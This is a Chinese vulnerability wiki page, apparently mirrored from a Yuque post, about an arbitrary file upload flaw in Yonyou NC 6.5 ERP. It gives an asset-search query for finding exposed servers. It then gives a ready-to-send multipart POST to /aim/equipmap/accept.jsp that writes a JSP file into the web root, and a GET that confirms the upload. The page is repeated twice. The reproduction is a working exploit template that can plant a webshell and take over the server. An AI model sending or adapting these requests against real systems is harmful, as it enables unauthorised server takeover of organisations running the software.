fofamini-wiki

登录白背景

源码

用友NC accept存在任意文件上传漏洞

一、漏洞描述

用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。用友NC accept存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。

二、影响版本

用友NC6.5

三、资产测绘

huiter：app.name=="用友 UAP"

登录页面

四、漏洞复现

POST /aim/equipmap/accept.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 263
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.txt"

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00
Content-Disposition: form-data; name="fname"

\webapps\nc_web\stc.jsp
--00content0boundary00--

上传文件位置

GET /stc.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/tv0wqvupcpg85sf1

# 用友NC accept存在任意文件上传漏洞

# 一、漏洞描述
用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC accept存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。

# 二、影响版本

- 用友NC6.5

# 三、资产测绘

- huiter：`app.name=="用友 UAP"`

![image.png](./img/kchJw8a_FqqehEyI/1691729367315-f00b542f-0929-41cc-8671-84149242ffca-005123.png)

- 登录页面

![image.png](./img/kchJw8a_FqqehEyI/1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec-777163.png)

# 四、漏洞复现
```
POST /aim/equipmap/accept.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 263
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.txt"

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00
Content-Disposition: form-data; name="fname"

\webapps\nc_web\stc.jsp
--00content0boundary00--
```
![image.png](./img/kchJw8a_FqqehEyI/1706887184849-297e33c3-21ad-449b-8200-8397c77a5b63-601024.png)
上传文件位置
```
GET /stc.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image.png](./img/kchJw8a_FqqehEyI/1706887231761-ac12d754-6088-483f-806d-35b29b6fe972-411920.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tv0wqvupcpg85sf1>